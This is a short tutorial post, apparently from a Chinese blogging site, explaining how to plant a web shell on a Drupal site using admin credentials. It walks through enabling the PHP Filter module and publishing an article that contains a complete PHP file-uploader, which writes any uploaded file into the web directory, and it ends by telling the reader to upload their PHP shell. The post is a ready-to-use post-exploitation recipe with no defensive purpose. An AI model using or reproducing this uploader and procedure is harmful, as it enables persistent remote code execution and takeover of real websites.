Drupal - upload shell with admin privilege

  1. login drupal with admin username and password.
  2. enable PHP Filter
  3. Add content with PHP Code
<?php
if(isset($_POST['Submit']))
{
    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];

    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
}
else{
echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; }?>

Enable PHP Filter (Modules Settings), and save it.

Enable PHP Filter


Add a new article with PHP Code format, and POST it.

Add content with PHP Code


Go to Drupal home page, and you can find upload page.

PHP Code Executes


Upload your php shell.

PHP Shell

展开阅读全文
©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值